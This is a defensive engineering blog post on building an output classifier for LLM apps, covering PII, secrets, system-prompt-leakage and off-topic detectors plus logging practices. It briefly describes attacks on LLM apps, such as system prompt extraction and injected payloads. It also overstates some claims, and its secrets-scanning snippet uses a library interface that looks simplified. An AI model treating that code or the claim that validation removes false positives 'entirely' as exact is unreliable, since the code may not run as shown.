Output Classification: A PII and Secrets Detector for LLM Apps

The input side of LLM security gets all the attention. Input is the obvious attack surface; the output side feels like a downstream concern. In practice, output classification is where you catch the things your input filter missed — leaked system prompts, exfiltrated PII, emitted secrets, malicious payloads heading to a downstream renderer. Skipping it leaves the heaviest gaps unguarded. It is the output-rail half of the LLM guardrails stack; this post is the build guide for it.

This is the production-grade approach we’ve shipped at multiple defenders.

What an output classifier actually checks

A useful output classifier runs every model response through a sequence of detectors. Each detector is independent, returns a verdict + confidence, and never exceeds 50ms p99 latency on its own.

The base detectors:

PII detection — names, emails, phone numbers, addresses, government IDs, payment cards, health info
Secrets detection — API keys, tokens, private keys, passwords, internal hostnames
System prompt leakage — substring overlap between output and the system prompt
Injected instruction echo — output that contains imperative-mood directives at unusual density (signs the model is forwarding an injected payload)
Markdown/HTML rendering hazards — output contains JS URIs, off-domain links, encoded HTML
Off-policy content — falling outside the application’s allowed domain (e.g. a customer-support bot answering medical questions)

In production, you typically get the first three for free with off-the-shelf libraries. The last three require app-specific rules. Toxicity and policy-category scoring is a related but separate job — see our content moderation tools guide for that surface.

Building the PII detector

Microsoft Presidio ↗ is the most-used open-source option. It ships ~30 entity types, integrates with spaCy or Transformers backends, and is fast enough for production.

The trap is that Presidio’s defaults flag aggressively. Out of the box, you’ll get false positives on:

Random alphanumeric strings the regex thinks are credit cards
Common first names embedded in unrelated content
Hex strings that look like IBAN

Tune the recognizers per your domain. For most LLM apps:

from presidio_analyzer import AnalyzerEngine, RecognizerRegistry
from presidio_analyzer.predefined_recognizers import (
    EmailRecognizer, PhoneRecognizer, CreditCardRecognizer,
    UsSsnRecognizer, IbanRecognizer
)

registry = RecognizerRegistry()
# Only the recognizers your domain actually needs
registry.add_recognizer(EmailRecognizer())
registry.add_recognizer(PhoneRecognizer(supported_regions=["US", "GB"]))
registry.add_recognizer(CreditCardRecognizer())
analyzer = AnalyzerEngine(registry=registry)

results = analyzer.analyze(text=output, language="en")
flagged = [(r.entity_type, r.score, output[r.start:r.end]) for r in results if r.score > 0.85]

The threshold is a precision/recall dial on Presidio’s per-entity confidence score: a lower threshold (around 0.7) catches more borderline matches at the cost of more false positives, while a higher threshold (around 0.85) trims false positives but lets some lower-confidence true PII through. There is no universally correct value: calibrate it against your own labeled outputs, and set it per entity type if your false-positive tolerance differs across, say, credit-card numbers versus names.

Building the secrets detector

Don’t roll your own regex. TruffleHog ↗ maintains the most comprehensive set of secret-detection rules — 800+ patterns across cloud providers, SaaS APIs, internal services. The engine validates suspected secrets against the actual provider’s API where possible, eliminating false positives entirely.

Run it as a library, not a subprocess:

import trufflehog3
results = trufflehog3.scan_text(output)
verified_hits = [r for r in results if r.get("Verified") is True]

If Verified is True, the string was confirmed as a live secret by calling the issuing service. Block the output unconditionally.

If Verified is False but a high-confidence pattern matched, you have a likely secret that wasn’t validatable (revoked, custom-issued, or rate-limited). Default to block in production; allow override for trusted internal flows.

System prompt leakage

This is the detector most teams skip and most attacks exploit. Compute a rolling-hash representation of the system prompt at request time. After generating the response, scan for substring matches at length ≥ 40 characters.

import re
def system_prompt_overlap(output: str, system_prompt: str, min_len: int = 40) -> bool:
    # Find longest common substring; if >= min_len, flag
    # Production version uses suffix automaton; this is the simple form
    for i in range(len(system_prompt) - min_len):
        chunk = system_prompt[i:i + min_len]
        if chunk in output:
            return True
    return False

40 characters is short enough to catch leakage of meaningful instructions and long enough to avoid false positives on common phrases. Tune to your prompt length.

When this fires, the response is blocked AND the session is marked compromised — assume the attacker can reproduce and exfiltrate further. Log the request_id for retro analysis.

Off-policy content

The hardest detector to build because “off-policy” is application-specific. The most reliable approach we’ve found:

Define the application’s allowed topic surface as a fixed set of phrases (10-50 entries; the customer-support bot’s “what we sell,” “shipping policies,” “returns process,” etc.)
Compute embedding similarity between the output and each allowed phrase
Take the max similarity. If below threshold, the output drifted off-policy.

This catches:

A coding assistant answering legal questions
A customer-support bot weighing in on geopolitics
A medical-info bot opining on stock picks

The threshold is empirical (typically 0.4-0.6 with sentence-transformer/all-mpnet) and needs domain tuning.

Output composition: pipeline structure

def classify_output(output: str, ctx: dict) -> Verdict:
    checks = [
        pii_check(output),
        secrets_check(output),
        system_prompt_leak_check(output, ctx["system_prompt"]),
        markdown_hazard_check(output),
        off_policy_check(output, ctx["allowed_topics"]),
    ]
    # Any block-severity match → block
    if any(c.severity == "block" for c in checks):
        return Verdict.block(reasons=[c for c in checks if c.severity == "block"])
    # Any warn → log + alert + pass
    if any(c.severity == "warn" for c in checks):
        return Verdict.warn(reasons=[c for c in checks if c.severity == "warn"])
    return Verdict.pass_()

In production, run this as a sidecar to the LLM call, not inline. Latency budget for the full pipeline should be ≤100ms p95. If you exceed that, the LLM call’s UX degrades noticeably.

What to log

Every classification decision emits a structured event with:

request_id, session_id, user_id
The detectors that fired (entity types, severity, confidence)
The truncated matched span (max 50 chars; never the full secret/PII)
The action taken (block, warn, pass)

This is the audit trail when you need to investigate a leakage incident or tune detectors. It’s also the data you train on to improve recall.

What to NOT do

Don’t show the user what was redacted. “We blocked ‘4111-1111-1111-1111’ from your response” tells the attacker exactly what triggered the filter. Show a generic message.
Don’t store full responses with detected PII in normal logs. That’s a recursive privacy problem. Redact at log time.
Don’t trust the LLM to self-classify. “Ask GPT if this output contains PII” sounds clever but adversarial inputs that bypass the production model also bypass the judge model.
Don’t fail open on classifier errors. If the detector throws an exception, default to block. Production stability requires this.

Cross-mapping

This pipeline addresses OWASP LLM02 Insecure Output Handling ↗ and parts of LLM06 (Sensitive Information Disclosure) and LLM07 (System Prompt Leakage). For the input side and the architectural concerns, see our LLM guardrails overview and the detection engineering runbook ↗ on the sister site.

The output filter ↗ is not the most fun part of LLM security to build, but it catches the highest-impact class of failures. Build it before you build anything else.

→ This post is part of the LLM Guardrails Hub — the complete index of defensive AI ↗ engineering resources on GuardML.

Output Classification: A PII and Secrets Detector for LLM Apps

What an output classifier actually checks

Building the PII detector

Building the secrets detector

System prompt leakage

Off-policy content

Output composition: pipeline structure

What to log

What to NOT do

Cross-mapping

Sources

GuardML — in your inbox

Related

AI Moderation Tools for LLMs: What Works and What Gets Bypassed

AI Safety Tools: A Guide to Guardrails, Filters, and Defenses

Model Alignment: What It Is, How It Works, and Where It Fails

Comments